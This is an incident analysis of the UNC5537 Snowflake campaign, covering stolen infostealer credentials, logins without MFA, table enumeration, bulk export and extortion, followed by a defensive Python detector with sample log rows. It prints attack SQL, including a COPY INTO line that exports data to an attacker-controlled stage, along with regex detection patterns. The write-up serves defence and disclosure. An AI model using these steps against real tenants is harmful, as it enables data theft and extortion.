UNC5537 / Snowflake – Infostealer Creds → No MFA → SHOW TABLES → Bulk Exfil → 100+ Orgs Extorted
A financially motivated threat actor tracked as UNC5537 spent months harvesting Snowflake credentials from infostealer malware logs, then systematically logged into victim Snowflake tenants — none of which required MFA — and exfiltrated large datasets. Over 100 organisations were hit, including Ticketmaster (560M records), AT&T (73M records), and Santander Bank. Snowflake itself was not breached; the attack was entirely predicated on absent MFA and reused credentials.
UNC5537 sourced valid Snowflake credentials from infostealer malware logs — RedLine, Vidar, and Lumma stealer families had infected contractor and employee devices, exfiltrating saved browser credentials, including Snowflake login URLs. The logs were purchased from underground markets or obtained from prior campaigns. Mandiant confirmed some credentials were years old and still valid because passwords had never been rotated.
Credential age: Some logs dated years prior to the campaign — passwords never rotated
Why it worked: No Snowflake-side MFA requirement · No network policy allowlisting · No anomalous-login alerting
Using the harvested credentials, UNC5537 authenticated to each victim's Snowflake instance. Snowflake did not enforce MFA by default at the time — it was available but opt-in. None of the compromised accounts had MFA enabled, and no network policy restricted which IPs could connect to the tenants. The attacker connected using the SnowSQL CLI and the Snowflake JDBC driver to automate credential testing at scale.
MFA status: Not enforced — opt-in at account level, not mandated by Snowflake platform policy
Network policy: No IP allowlist configured on any of the affected tenants
Detection gap: Logins from new IPs/countries generated no alert to account owners
Once authenticated, UNC5537 ran Snowflake's native enumeration commands to identify all databases, schemas, and tables accessible to the compromised user. The commands are native SQL — no exploitation required. Because the accounts were often service accounts or analyst accounts with broad SELECT permissions, the full data landscape of the tenant was visible in seconds.
Also used: SELECT * FROM INFORMATION_SCHEMA.TABLES to enumerate accessible objects
Typical finding: PII tables — customer names, emails, phone numbers, payment card data, SSNs
UNC5537 used standard Snowflake SQL to stage target data into temporary tables, then exported it via COPY INTO to an external stage (attacker-controlled S3 bucket or Azure Blob) or downloaded it directly via GET. Large datasets like Ticketmaster's 560M-row table were extracted over multiple sessions. Snowflake's query history log retained these commands, providing forensic visibility after the fact — but no real-time alerting fired during exfiltration.
Stage 2 — export: COPY INTO @external_stage/dump.csv.gz FROM attacker_export;
Scale (Ticketmaster): 560M records, 1.3TB — sold on BreachForums for $500,000
Detection gap: No DLP on Snowflake COPY INTO · No alert on large external stage writes
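The detection gaps above (no alert on password-only logins from unexpected IPs, no alert on writes to external stages) can be closed by correlating Snowflake's login and query history. The Python below is an added example, not code from the original write-up, Mandiant or Snowflake: it runs over constructed rows shaped like the ACCOUNT_USAGE.LOGIN_HISTORY and QUERY_HISTORY columns, and the IP allowlist and approved-stage names are assumptions a defender would replace with their own.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample rows shaped like Snowflake's ACCOUNT_USAGE.LOGIN_HISTORY and
# QUERY_HISTORY views (column names are Snowflake's; every value here is made up).
LOGINS = [
    {"USER_NAME": "ETL_SVC", "CLIENT_IP": "10.20.0.5", "IS_SUCCESS": "YES",
     "FIRST_AUTHENTICATION_FACTOR": "PASSWORD", "SECOND_AUTHENTICATION_FACTOR": "DUO_PUSH"},
    {"USER_NAME": "ANALYST01", "CLIENT_IP": "203.0.113.77", "IS_SUCCESS": "YES",
     "FIRST_AUTHENTICATION_FACTOR": "PASSWORD", "SECOND_AUTHENTICATION_FACTOR": None},
]
QUERIES = [  # in execution order within each session
    {"SESSION_ID": 1, "USER_NAME": "ANALYST01", "QUERY_TEXT": "SHOW TABLES IN DATABASE CUSTOMERS"},
    {"SESSION_ID": 1, "USER_NAME": "ANALYST01",
     "QUERY_TEXT": "CREATE TEMPORARY TABLE attacker_export AS SELECT * FROM CUSTOMERS.PUBLIC.ACCOUNTS"},
    {"SESSION_ID": 1, "USER_NAME": "ANALYST01",
     "QUERY_TEXT": "COPY INTO @external_stage/dump.csv.gz FROM attacker_export"},
    {"SESSION_ID": 2, "USER_NAME": "ETL_SVC", "QUERY_TEXT": "COPY INTO @corp_reports/daily.csv FROM REPORTS.DAILY"},
]
IP_ALLOWLIST = {"10.20.0.0/16"}      # hypothetical corporate egress range
APPROVED_STAGES = {"corp_reports"}   # hypothetical stages the data team may write to
ENUM_RE = re.compile(r"^\s*SHOW\s+(TABLES|SCHEMAS|DATABASES)\b|INFORMATION_SCHEMA\.TABLES", re.I)
EXPORT_RE = re.compile(r"\b(COPY\s+INTO|GET)\s+@(\w+)", re.I)  # write to, or download from, a stage

def weak_logins(logins, allowlist=IP_ALLOWLIST):
    """Successful password-only logins from outside the allowlist: the UNC5537 entry pattern."""
    nets = [ipaddress.ip_network(n) for n in allowlist]
    hits = []
    for row in logins:
        ip = ipaddress.ip_address(row["CLIENT_IP"])
        no_mfa = row["SECOND_AUTHENTICATION_FACTOR"] is None
        if row["IS_SUCCESS"] == "YES" and no_mfa and not any(ip in n for n in nets):
            hits.append(f"{row['USER_NAME']}: password-only login from non-allowlisted IP {ip}")
    return hits

def exfil_sessions(queries, approved=APPROVED_STAGES):
    """Sessions exporting to an unapproved stage; HIGH when enumeration preceded the export."""
    by_session = defaultdict(list)
    for q in queries:
        by_session[q["SESSION_ID"]].append(q)
    hits = []
    for sid, rows in by_session.items():
        enumerated = False
        for q in rows:
            enumerated = enumerated or bool(ENUM_RE.search(q["QUERY_TEXT"]))
            m = EXPORT_RE.search(q["QUERY_TEXT"])
            if m and m.group(2).lower() not in approved:
                hits.append(f"[{'HIGH' if enumerated else 'MEDIUM'}] session {sid} ({q['USER_NAME']}): export to unapproved stage @{m.group(2)}")
    return hits
```

In production the same two rules map onto scheduled queries against the ACCOUNT_USAGE views, with the allowlist enforced as a Snowflake network policy rather than checked after the fact.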
After exfiltration, UNC5537 contacted victims directly with samples of stolen data as proof, demanding payment for deletion. When victims did not pay, datasets were listed for sale on BreachForums. The Ticketmaster database was offered for $500,000; AT&T data was listed separately. Mandiant assessed UNC5537 had at least one member residing in North America and coordinated with a partner in Turkey.
BreachForums listing: Ticketmaster — 560M records, $500,000 · AT&T — 73M records
Actor attribution: UNC5537 — financially motivated, some members in North America and Turkey